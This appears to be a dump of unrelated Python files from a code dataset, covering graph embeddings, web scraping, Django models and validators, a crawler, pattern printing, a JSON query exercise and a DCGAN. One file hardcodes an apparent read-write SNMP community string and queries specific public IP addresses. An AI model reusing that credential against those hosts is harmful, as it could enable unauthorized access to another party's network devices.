len(train_patient))\nprint('验证集样本数:', len(val_patient))\nprint('测试集样本数:', len(test_patient))\n\npatient = np.concatenate((train_patient, val_patient, test_patient), axis = 0)\n\n# onehot label转整数\nlabel = patient[:, 0:4]\npatient_label = []\nfor i in range(len(label)):\n patient_label.append(list(label[i]).index(max(label[i])))\n\nfor i in range(len(patient_label)):\n if patient_label[i] != 1:\n patient_label[i] = 0\n\npatient_feat = patient[:, 8:]\n# print(patient_feat)\n\n# 患者症状矩阵转患者症状名称\npatient_feat_name = []\nfor i in range(len(patient_feat)):\n temp = []\n for j in range(len(patient_feat[i])):\n if patient_feat[i, j] != 0:\n temp.append(name[j])\n patient_feat_name.append(temp)\n\nprint(patient_feat_name)\n\ndef get_randomwalk(node, path_length):\n random_walk = [node]\n\n for i in range(path_length - 1):\n temp = list(G.neighbors(node))\n temp = list(set(temp) - set(random_walk))\n if len(temp) == 0:\n break\n\n random_node = random.choice(temp)\n random_walk.append(random_node)\n node = random_node\n\n return random_walk\n\n# print(get_randomwalk('space exploration', 10))\n\n# get list of all nodes from the graph\nall_nodes = list(G.nodes())\n\nrandom_walks = []\nfor n in tqdm(all_nodes):\n for i in range(5):\n random_walks.append(get_randomwalk(n, 10))\n\n# count of sequences\nprint(len(random_walks))\nprint('random_walks list:', random_walks)\n\nfrom gensim.models import Word2Vec\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nmodel = Word2Vec(size=16, window = 10, sg = 1, hs = 0,\n negative = 10, # for negative sampling\n alpha=0.03, min_alpha=0.0007, workers = 1,\n seed = 2)\n\nmodel.build_vocab(random_walks, progress_per=2)\n\nmodel.train(random_walks, total_examples = model.corpus_count, epochs=50, report_delay=1)\n\n# terms = list(G.nodes)\n\n# print('***', model.wv.vectors)\nprint('气虚血瘀', model.wv['气虚血瘀'])\n\nembeddings = {}\nfor i in range(len(kg_name)):\n embeddings[kg_name[i]] = model.wv[kg_name[i]]\n\n# print(embeddings)\n\n# print(embeddings['气虚血瘀'])\n\npatient_embed = []\nfor i in range(len(patient_feat_name)):\n temp = []\n for j in range(len(patient_feat_name[i])):\n if patient_feat_name[i][j] in embeddings.keys():\n temp.append(embeddings[patient_feat_name[i][j]].reshape(1, -1))\n patient_embed.append(np.array(temp).mean(0))\n\npatient_embed = np.array(patient_embed).squeeze()\n\nprint(patient_embed.shape)\n\ntrain_X = patient_embed[: 360]\ntrain_Y = patient_label[: 360]\n\ntest_X = patient_embed[360 + 89:]\ntest_Y = patient_label[360 + 89:]\n\nmlp = MLPClassifier(hidden_layer_sizes=(), max_iter=150, random_state=2)\n\nmlp.fit(train_X, train_Y)\n\npred = mlp.predict(test_X)\nprint('准确率:', accuracy_score(pred, test_Y))\n\nconf_mat = confusion_matrix(test_Y, pred)\nprint('混淆矩阵:', conf_mat)\n\nprint(classification_report(test_Y, pred))","sub_path":"DeepWalk_embedding.py","file_name":"DeepWalk_embedding.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501773922","text":"from gd_utils import get_tree_from_str\n\ndef read_interval_file(filename):\n gt_list, st_list = [], []\n try:\n t = [line.strip() for line in open(filename, \"r\").readlines() if len(line.strip()) and line.strip()[0] != '#']\n gt_list, st_list = t[1:-1], t[-1]\n except IOError as e:\n print(filename, \" I/O error({0}): {1}\".format(e.errno, e.strerror))\n quit()\n return gt_list, st_list\n\n\ndef check(species, genetreelist):\n counter = 0\n for g in genetreelist:\n ok = False\n gt = get_tree_from_str(g)\n leaves = [x.name for x in gt.get_terminals()]\n if species[0] in leaves:\n ok = True\n if species[1] in leaves:\n ok = True\n if ok:\n counter = counter + 1\n return counter\n\n\nif __name__ == \"__main__\":\n gtl, st = read_interval_file(\"tests/treefam.txt\")\n stree = get_tree_from_str(st)\n species = [x.name for x in stree.get_terminals()]\n\n # for s in species:\n # print(s, check([s], gtl))\n print(check([\"ORYSA\",\"ARATH\"], gtl))","sub_path":"gd_io.py","file_name":"gd_io.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613528437","text":"import requests\nimport bs4\n'''\npip install lxml # lxml parser - needs to be installed but not imported ---only if using lxml as parser rather than html.parser\n\nhttps://stackoverflow.com/questions/46490626/getting-all-links-from-a-page-beautiful-soup\n\n'''\nurl = 'http://www.acontecaeventos.com.br/marketing-promocional-sao-paulo'\nr = requests.get(url)\nhtml_content = r.text\nsoup = bs4.BeautifulSoup(html_content, 'html.parser') # or 'lxml'\nlinks = soup.find_all('a')\n\nfor link in links:\n print(type(link)) # returns \n print(link)\n print(link['href'])\n #print(link.get('href')) #same","sub_path":"Projects/Intro_and_ATBSwPy/web_scraping2.py","file_name":"web_scraping2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622480543","text":"from django.db import models\nfrom pages.models import BaseModule\nfrom pages.models import BasePanel\n\nfrom filer.fields.image import FilerImageField\n\n\nclass SingleVideoModule(BaseModule):\n\t@property\n\tdef module_type(self):\n\t\treturn \"single-video\"\n\n\timage = FilerImageField(null=True, blank=True)\n\tvideo_embed = models.TextField()\n\nclass DoubleVideoModule(BaseModule):\n\t@property\n\tdef module_type(self):\n\t\treturn \"double-video\"\n\n\timage_01 = FilerImageField(related_name=\"image_01_set\", null=True, blank=True)\n\tvideo_01_embed = models.TextField()\n\tvideo_01_title = models.CharField(max_length=50)\n\n\timage_02 = FilerImageField(related_name=\"image_02_set\", null=True, blank=True)\n\tvideo_02_embed = models.TextField()\n\tvideo_02_title = models.CharField(max_length=50)","sub_path":"django/vfestival/apps/videos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"217663101","text":"import signal\nimport json\nimport socket\nimport sys\nimport subprocess\nfrom threading import Thread\nimport time as timer\n\n#this function is copied and pasted, no shit I mean....\ndef text2int(textnum, numwords={}):\n if not numwords:\n units = [\n \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\",\n \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n ]\n\n tens = [\"\", \"\", \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\n scales = [\"hundred\", \"thousand\", \"million\", \"billion\", \"trillion\"]\n\n numwords[\"and\"] = (1, 0)\n for idx, word in enumerate(units): numwords[word] = (1, idx)\n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** (idx * 3 or 2), 0)\n\n ordinal_words = {'first':1, 'second':2, 'third':3, 'fifth':5, 'eighth':8, 'ninth':9, 'twelfth':12}\n ordinal_endings = [('ieth', 'y'), ('th', '')]\n\n textnum = textnum.replace('-', ' ')\n\n current = result = 0\n for word in textnum.split():\n if word in ordinal_words:\n scale, increment = (1, ordinal_words[word])\n else:\n for ending, replacement in ordinal_endings:\n if word.endswith(ending):\n word = \"%s%s\" % (word[:-len(ending)], replacement)\n\n if word not in numwords:\n raise Exception(\"Illegal word: \" + word)\n\n scale, increment = numwords[word]\n\n current = current * scale + increment\n if scale > 100:\n result += current\n current = 0\n return result + current\n\ndef wait_and_process(time):\n print(\"IN THREAD 4 REAL\")\n timer.sleep(time)\n bash_command = 'python send_sms.py \"Here is your reminder from Dylan!\"'\n output = subprocess.check_output(bash_command, shell=True)\n\ndef remind_me(live_command):\n index = live_command.find('remind me')\n print(live_command)\n print(len(live_command))\n delay = live_command[index + 10:].split(' ')\n print(delay[0] + \" \" + delay[1])\n try:\n time = text2int(delay[0])\n unit = delay[1]\n if unit.find('second') != -1:\n th = Thread(target = wait_and_process, args =[time])\n th.start()\n elif unit.find('minute') != -1:\n total = time * 60\n th = Thread(target = wait_and_process, args=[total])\n th.start()\n elif unit.find('hour') != -1:\n total = time*3600\n th = Thread(target = wait_and_process, args=[total])\n th.start()\n\n\n except Exception as e:\n print(\"problem occured with the remind me function\")\n\nprint(\"start!!!!!!!!!\")\n\nremind_me(\"remind me five seconds\")\nremind_me(\"remind me one minute\")\n","sub_path":"server/test_sms.py","file_name":"test_sms.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45665877","text":"import re\nimport time\nimport datetime\nimport queue\nimport random\nimport urllib\nimport urllib.robotparser\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport downloader\n\n\ndef crawl_links(seed_url, link_regex=None, delay=5, max_depth=-1, max_urls=-1, num_retries=1, cache=None):\n \"\"\"\n \"\"\"\n crawl_queue = [seed_url]\n \n seen = {seed_url:0}\n\n num_urls = 0\n rp = get_robot(seed_url)\n DL = downloader.downloader(delay=delay, num_retries=num_retries, cache=cache)\n\n while crawl_queue:\n url = crawl_queue.pop()\n depth = seen.get(url, -2)\n user_agent = downloader.USER_AGENT[random.randrange(0, len(downloader.USER_AGENT))]\n if rp.can_fetch(user_agent.get('User-Agent'), url):\n html = DL(url)\n links = []\n\n if depth != max_depth:\n if link_regex:\n links.extend(link for link in get_links(html) if re.search(link_regex, link))\n\n for link in links:\n link = normalize(seed_url, link)\n \n if link not in seen:\n seen[link] = depth + 1\n\n if same_domain(seed_url, link):\n crawl_queue.append(link)\n\n num_urls += 1\n if num_urls == max_urls:\n break\n else:\n downloader.show_msg('Blocked by robots.txt: ', url)\n \n pass\n\n\ndef get_robot(seed_url):\n \"\"\"返回robots.txt的解析对象\n \"\"\"\n # robot_parse = urllib.robotparser.RobotFileParser()\n robot_parse = urllib.robotparser.RobotFileParser()\n robot_parse.set_url(urllib.parse.urljoin(seed_url, '/robots.txt'))\n robot_parse.read()\n return robot_parse\n\n\ndef normalize(seed_url, link):\n \"\"\"去除链接干扰项\n \"\"\"\n parse_result = urllib.parse.urlparse(link)\n return urllib.parse.urljoin(seed_url, parse_result.path)\n\n\ndef same_domain(url1, url2):\n \"\"\"如果两个网址属于同一网站,返回True\n \"\"\"\n return urllib.parse.urlparse(url1).netloc == urllib.parse.urlparse(url2).netloc\n\n\ndef get_links(html):\n \"\"\"通过正则匹配获取链接\n \"\"\"\n webpage_regex = re.compile(r'.*?', re.S)\n return webpage_regex.findall(html)\n\n\nif __name__ == \"__main__\":\n crawl_links('http://example.webscraping.com', '/(index|view)', delay=0, num_retries=1, max_depth=1)","sub_path":"practice/python_spider/Chapter_three/crawl_s3.py","file_name":"crawl_s3.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285245777","text":"# import python modules\nimport os, random\nimport pandas as pd \nimport numpy as np \nimport cv2\n\ndatabase_path = \"~/laptop/present_work/pediatric_bone_age/database/rsna_bone_age\"\ntrain_label = \"train_label.csv\"\ntest_label = \"test_label.csv\"\n\ntrain_df = pd.read_csv(os.path.join(database_path, train_label))\nprint(train_df.head())\n\npid = list(train_df[\"id\"])\nage = list(train_df[\"boneage\"])\nmale = list(train_df[\"male\"])\n\n# getting the length of all column\nprint(len(pid)) # 12,611\nprint(len(age)) # 12,611\nprint(len(male))# 12,611\n# foudn no missing value\n\n\ntrain_df['gender'] = train_df['male'].map(lambda x: 'male' if x else 'female')\nboneage_mean = train_df['boneage'].mean()\nboneage_div = 2*train_df['boneage'].std()\n\n# we don't want normalization for now\nboneage_mean = 0\nboneage_div = 1.0\ntrain_df['boneage_zscore'] = train_df['boneage'].map(lambda x: (x-boneage_mean)/boneage_div)\ntrain_df.dropna(inplace = True)\nprint(train_df.sample(3))\n","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641237081","text":"import json\n\nfrom django.contrib.gis.db import models\n\n\nclass StateCensusTract(models.Model):\n \"\"\"\n This model represents the shapefile for census tracts per state. This\n model is auto-generated using the ogrinspect Django command.\n \"\"\"\n\n statefp = models.CharField(max_length=2)\n countyfp = models.CharField(max_length=3)\n tractce = models.CharField(max_length=6)\n geoid = models.CharField(max_length=11, unique=True)\n name = models.CharField(max_length=7)\n namelsad = models.CharField(max_length=20)\n mtfcc = models.CharField(max_length=5)\n funcstat = models.CharField(max_length=1)\n aland = models.FloatField()\n awater = models.FloatField()\n intptlat = models.CharField(max_length=11)\n intptlon = models.CharField(max_length=12)\n geom = models.MultiPolygonField(srid=4269)\n\n minlat = models.FloatField(db_index=True)\n maxlat = models.FloatField(db_index=True)\n minlon = models.FloatField(db_index=True)\n maxlon = models.FloatField(db_index=True)\n geojson = models.TextField()\n\n objects = models.GeoManager()\n\n def __str__(self):\n return '%s (county: %s, state: %s)' % (\n self.namelsad, self.countyfp, self.statefp)\n\n def auto_fields(self):\n \"\"\"Populate the min and max lat/lon based on this object's geometry;\n also pre-compute a geojson representation for this model\"\"\"\n lons, lats = zip(*[pt for polygon in self.geom.coords\n for line in polygon\n for pt in line])\n self.minlat = min(lats)\n self.maxlat = max(lats)\n self.minlon = min(lons)\n self.maxlon = max(lons)\n\n # geometry is a placeholder, as we'll be inserting a pre-serialized\n # json string\n geojson = {\"type\": \"Feature\", \"geometry\": \"$_$\"}\n geojson['properties'] = {\n 'statefp': self.statefp,\n 'countyfp': self.countyfp,\n 'tractce': self.tractce,\n 'geoid': self.geoid,\n 'name': self.name,\n 'namelsad': self.namelsad,\n 'aland': self.aland,\n 'awater': self.awater,\n 'intptlat': self.intptlat,\n 'intptlon': self.intptlon,\n 'minlat': self.minlat,\n 'maxlat': self.maxlat,\n 'minlon': self.minlon,\n 'maxlon': self.maxlon\n }\n geojson = json.dumps(geojson)\n geojson = geojson.replace(\n '\"$_$\"',\n self.geom.simplify(preserve_topology=True).geojson)\n self.geojson = geojson\n\n def save(self):\n self.auto_fields()\n super(StateCensusTract, self).save()\n\n\n# Auto-generated `LayerMapping` dictionary for CensusTract model\ncensustract_mapping = {\n 'statefp': 'STATEFP',\n 'countyfp': 'COUNTYFP',\n 'tractce': 'TRACTCE',\n 'geoid': 'GEOID',\n 'name': 'NAME',\n 'namelsad': 'NAMELSAD',\n 'mtfcc': 'MTFCC',\n 'funcstat': 'FUNCSTAT',\n 'aland': 'ALAND',\n 'awater': 'AWATER',\n 'intptlat': 'INTPTLAT',\n 'intptlon': 'INTPTLON',\n 'geom': 'MULTIPOLYGON',\n}\n","sub_path":"institutions/geo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378154902","text":"#3.1\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(1,n+1):\n for j in range(i):\n print(\"*\",end='') \n print(\"\")\n\n#3.2\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(1,n+1):\n for j in range(n,i,-1):\n print(\" \",end='') \n for k in range(i):\n print(\"*\",end='')\n print(\"\") \n\n#3.3\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(n): \n for j in range(n-1,i,-1):\n print(\" \",end='')\n print(\"*\",end='')\n for j in range(i+(i-1)):\n print(\" \",end='')\n if i >= 1:\n print(\"*\")\n elif i == 0:\n print(\"\") \n\n#3.4\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n if n == 1:\n print(\"*\")\n break\n\n for j in range(i):\n print(\" \",end='')\n print(\"*\",end='')\n for k in range(n-2-2*i):\n print(\" \" if n>2 else '',end='')\n print(\"*\" if i == 0 or i != int(n/2) else '',end='')\n \n print(\"\")\n \n if(not reverse):\n i += 1 \n elif(reverse):\n i -= 1\n \n if n%2 == 0 and i == n/2 and not reverse:\n i -= 1\n reverse = True\n elif i == int(n/2) and not reverse:\n reverse = True\n\n\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n if n == 1:\n print(\"*\")\n break\n \n for j in range(n-1,i-1,-1):\n print(\" \",end='')\n for k in range(2*i+1):\n print(\"*\",end='') \n print(\"\")\n \n if(not reverse):\n i += 1 \n elif(reverse):\n i -= 1\n \n if n%2 == 0 and i == n/2 and not reverse:\n i -= 1\n reverse = True\n elif i == int(n/2) and not reverse:\n reverse = True\n\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n for j in range(n-2,i-1,-1):\n if not reverse:\n print(\"A\",end='')\n else:\n print(\"C\",end='')\n print(\"+\",end='') \n for k in range(2*(i-1)+1):\n print(\"E\",end='') \n\n print(\"+\" if i > 0 else \"\",end='')\n \n for j in range(n-2,i-1,-1):\n if not reverse:\n print(\"B\",end='')\n else:\n print(\"D\",end='')\n\n print(\"\")\n if(not reverse):\n i += 1 \n elif(reverse):\n i -= 1\n \n if i > n-1:\n i = n - 2\n reverse = True\n\n\n#4\n# the difference between else and finally is that else clause \n# executes if the try block doesn't run into any exception\n# where as finally clause while coming out of the try block.\n\ndef divide(x,y):\n try:\n result = x/y\n except ZeroDivisionError:\n print(\"division by zero\")\n else:\n print(\"The result:\",result)\n finally:\n print(\"Finally clause\")\n\ndivide(2,1)\ndivide(2,0)\ndivide(\"2\",\"1\")","sub_path":"patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79838402","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\n\n\ncmdGen = cmdgen.CommandGenerator()\n\n\n# 1.3.6.1.2.1.2.2.1.10.2\n\n# (1, 3, 6, 1, 2, 1, 4, 20, 1, 1)\ndef get(ip):\n errorIndication, errorStatus, errorIndex, varBinds = cmdGen.bulkCmd(\n cmdgen.CommunityData('chinalife-rw'),\n cmdgen.UdpTransportTarget((ip, 161)),\n 0, 25,\n (1, 3, 6, 1, 2, 1, 4, 20)\n\n )\n if errorIndication:\n print(ip + '---' + str(errorIndication))\n else:\n for var in varBinds:\n if '2.'+ip in str(var[0]):\n print('1.3.6.1.2.1.2.2.1.10.'+str(var[0])[-1:])\n\n\n# get('1.180.143.238')\nget('124.135.9.42')\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593818307","text":"import pygame\r\n\r\nfrom widget import Widget\r\n\r\nclass Menu (Widget):\r\n \"\"\"\r\n Class defining a text menu of options that a user may select and execute.\r\n \"\"\"\r\n def __init__(self,rect):\r\n super(Menu,self).__init__(rect)\r\n \r\n self.options = [] # A list of (widget,method,*arg) tuples.\r\n \r\n self.add_mouse_handler(self.click, pygame.MOUSEBUTTONDOWN, 1, 1)\r\n self.add_mouse_handler(self.click, pygame.MOUSEBUTTONDOWN, 3, 3)\r\n \r\n def do_nothing(self):\r\n pass\r\n \r\n def add_option(self, widget, method=None,*arguments):\r\n if method == None:\r\n method = self.do_nothing\r\n widget.rect = (widget.x0,widget.y0,widget.width,widget.height)\r\n self.options.append((widget,method,arguments))\r\n \r\n def _tick(self,deltaTime):\r\n super(Menu,self)._tick(deltaTime)\r\n for (widget,_,_) in self.options:\r\n widget._tick(deltaTime)\r\n self.update()\r\n \r\n def click(self,button):\r\n (mouseX, mouseY) = pygame.mouse.get_pos()\r\n (mouseX, mouseY) = (mouseX - self.x0, mouseY - self.y0)\r\n for (widget, method, args) in self.options:\r\n if pygame.Rect(widget.rect).collidepoint(mouseX, mouseY):\r\n method(*args)\r\n return True\r\n \r\n def _draw(self):\r\n super(Menu,self)._draw()\r\n \r\n for (widget, _, _) in self.options:\r\n widget._draw()\r\n self.surface.blit(widget.surface, (widget.x0, widget.y0) )\r\n\r\n\r\n ","sub_path":"duelfieldstars/ui/ui_abstract/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590121374","text":"#Blinking turtle for introductory programming lab\n\nimport turtle\n\ndef main():\n numSides = 8\n daniel = turtle.Turtle() #Set up a turtle named \"daniel\"\n myWin = turtle.Screen() #The graphics window\n\n #Draw a square\n for i in range(numSides):\n if i % 2 == 0:\n daniel.color(\"red\")\n else:\n daniel.color(\"green\") \n daniel.forward(100) #Move forward 10 steps\n daniel.right(360/numSides) #Turn 90 degrees to the right\n\n myWin.exitonclick() #Close the window when clicked\n \nmain()\t\t\n","sub_path":"teaching/cmp/cis166/s14/blinkTurtle.py","file_name":"blinkTurtle.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628652124","text":"# coding=utf-8\nimport socket\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import URLValidator\n\n__author__ = 'cainli'\n\n\ndef validate_multiurl(value):\n if not value:\n urls = []\n else:\n urls = value.split('\\r\\n')\n for url in urls:\n try:\n validator = URLValidator()\n validator(url)\n except ValidationError:\n raise ValidationError(u'%s不正确请检查格式以及是否可用' % url)\n\n\ndef validate_host(value):\n if value.startswith(\"http://\") or value.startswith(\"https://\"):\n raise ValidationError(u'请输入域名,不要带http,https之类')\n try:\n # ip = socket.gethostbyname(value)\n result = socket.getaddrinfo(value, None)\n ip = result[0][4]\n except:\n raise ValidationError(u'域名不可以用,请检查格式或者是否DNS解析成功')\n\n if ip != '120.24.183.207':\n raise ValidationError(u'请检查DNS配置,配置的ip不正确,ip应该配置为120.24.183.207')\n\n# get_ip_address('lo') 内网 '127.0.0.1'\n# get_ip_address('eth0') 外网 '38.113.228.130'\n# def get_ip_address(ifname):\n# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# return socket.inet_ntoa(fcntl.ioctl(\n# s.fileno(),\n# 0x8915, # SIOCGIFADDR\n# struct.pack('256s', ifname[:15])\n# )[20:24])\n","sub_path":"wxms/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523926593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nnum = int(input())\ncontent = []\nfor i in range(num * 3):\n content.append(list(map(int,input().split())))\n\ndef get_li(li):\n i = 0\n narray = []\n for i in range(num):\n narray.append([])\n j = i * 3\n for j in range(j, j + 3):\n narray[i].append(li[j])\n return narray\n\ndef judge(li, u=1):\n for i in range(3):\n if li[i][0] == li[i][1] == li[i][2] == u:\n return True\n for i in range(3):\n if li[0][i] == li[1][i] == li[2][i] == u:\n return True\n if li[0][0] == li[1][1] == li[2][2] == u:\n return True\n if li[2][0] == li[1][1] == li[0][1] == u:\n return True\n return False\n\n\ndef space(li, u=0):\n count = 0\n for i in range(3):\n for j in range(3):\n if li[i][j] == u:\n count += 1\n return count\n\n\ndef dfs(li, u):\n max1, min1 = -10, 10\n if u==1 and judge(li, 2):\n return -space(li)-1\n if u==2 and judge(li, 1):\n return space(li)+1\n if (space(li) >= 7) or (space(li)==0): return 0\n \n for i in range(3):\n for j in range(3):\n if li[i][j] == 0:\n #lic = copy.deepcopy(li)\n li[i][j] = u\n if u==1:\n max1=max(max1,dfs(li, 2))\n else:\n min1=min(min1,dfs(li, 1))\n li[i][j]=0\n if u==1:\n return max1\n else:\n return min1\nfor i in get_li(content):\n if judge(i):\n print(space(i)+1)\n elif judge(i, 2):\n print(-space(i)-1)\n else:\n print(dfs(i, 1))\n\n\nimport dashtable\n\nf = ''\nl = dashtable.html2rst(f)\nprint l\n\n'''\n'''\n\n\nnum = int(input())\nn = num//10\n\ndef buy(n):\n if n == 0:\n return 0\n if n == 1:\n return 1\n if n == 2:\n return 2\n if n == 3:\n return 4\n if n == 4:\n return 5\n if n == 5:\n return 7\n x = 0\n if n>5:\n x = buy(n-5)+7\n return x\nprint(buy(n))\n\n\n\nN, k = list(map(int,input().split()))\n\ntecher = []\nfor i in range(k):\n techer.append(list(map(int, input().split())))\npub = list(range(1,N+1))\n\nstart_pub = []\nend_pub = []\n\nfor i in techer:\n start_pub.append([i[1],i[0]])\n end_pub.append([i[-1]+i[1],i[0]])\n\nstart_pub.sort()\nend_pub.sort()\n\ndef main():\n for i in range(N**2):\n while len(start_pub)>0 and start_pub[0][0]0:\n a = end_pub[0][1]\n end_pub.pop(0)\n pub[pub.index(0)] = a\n else:\n return pub\n\nprint(' '.join(map(str,main())))\n\n'''\nn = list(map(int,input().split()))\nn, m = n[0], n[1]\n\nall = ''\nfor i in range(n):\n all = all + input()\nfind = []\nfor i in range(m):\n find.append(input())\n\na = all.count(': ')\n\nwhile a != 0:\n all = all.replace(': ',':')\n a = all.count(': ')\n\ntry:\n d = eval(all)\nexcept:\n a = all.count(' ')\n while a != 0:\n all = all.replace(' ', '')\n a = all.count(' ')\nd = eval(all)\n\nfor i in find:\n i = i.split('.')\n b = len(i)\n if b == 0:\n x = d.get(i[0])\n if isinstance(x, str):\n print('STRING',x)\n elif isinstance(x, dict):\n print('OBJECT')\n else:\n print('NOTEXIST')\n else:\n x = d.get(i[0])\n for j in range(b-1):\n x = x.get(i[j+1])\n if isinstance(x, str):\n print('STRING',x)\n elif isinstance(x, dict):\n print('OBJECT')\n else:\n print('NOTEXIST')\n \n \n'''\n\n{\n\"firstName\": \"John\",\n\"lastName\": \"Smith\",\n\"address\": {\n\"streetAddress\": \"2ndStreet\",\n\"city\": \"NewYork\",\n\"a\": {\n\"d\": \"e\",\n\"f\": {\n\"d\": \"4\"\n}\n},\n\"state\": \"NY\"\n},\n\"esc\\\\aped\": \"\\\"hello\\\"\"\n}\nfirstName\naddress\naddress.city\naddress.postal\nesc\\aped\naddress.a.d\naddress.a.f\n'''\n","sub_path":"exercise/201808/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289067468","text":"import torch\nimport torch.nn as nn\n\nclass NetG(nn.Module):\n \"\"\"\n 生成器定义\n \"\"\"\n def __init__(self,opt):\n super(NetG, self).__init__()\n ngf = opt.ngf # 生成器feature map数\n\n self.main = nn.Sequential(\n # 输入是一个nz维度的噪声,我们可以认为它是一个nz*1*1的feature map\n nn.ConvTranspose2d(in_channels=opt.nz, out_channels=ngf * 8, kernel_size=4, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(ngf * 8), #批 规范化 层\n nn.ReLU(True), # (True)会把输出直接覆盖到输入中\n # 上一步的输出形状:(ngf*8) x 4 x 4\n #nn.ConvTranspose2d(in_channels, out_channel, kernel_size, stride, padding,output_padding=, bias)\n # 逆卷积 卷积核 步长(扩大倍数) 输入填充(加边) 输出填边 添加偏离\n #out =output_padding + (in - 1 )* Stride - 2 * padding + kernel_size\n # 输入是一个nz维度的噪声,我们可以认为它是一个1*1*nz的feature map\n\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # 上一步的输出形状: (ngf*4) x 8 x 8\n\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # 上一步的输出形状: (ngf*2) x 16 x 16\n\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # 上一步的输出形状:(ngf) x 32 x 32\n\n nn.ConvTranspose2d(ngf, 3, 5, 3, 1, bias=False),\n nn.Tanh() # 输出范围 -1~1 故而采用Tanh\n # 输出形状:3 x 96 x 96\n )\n\n def forward(self, input):\n return self.main(input)\n\n\nclass NetD(nn.Module):\n \"\"\"\n 判别器定义\n \"\"\"\n\n def __init__(self, opt):\n super(NetD, self).__init__()\n ndf = opt.ndf\n\n self.main = nn.Sequential(\n # 输入 3 x 96 x 96\n nn.Conv2d(3, ndf, 5, 3, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n # 输出 (ndf) x 32 x 32\n\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 2, 0.8),\n # 输出 (ndf*2) x 16 x 16\n\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 4, 0.8),\n # 输出 (ndf*4) x 8 x 8\n\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25),\n nn.BatchNorm2d(ndf * 8, 0.8),\n # 输出 (ndf*8) x 4 x 4\n\n\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n\n nn.Sigmoid() # 输出一个数(概率)\n )\n def forward(self, input):\n return self.main(input).view(-1)\n\n","sub_path":"t1/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170627107","text":"import torch\n\nimport math\n\nimport models\nimport dataset\n\n\nwith torch.no_grad():\n\n # state_dict = 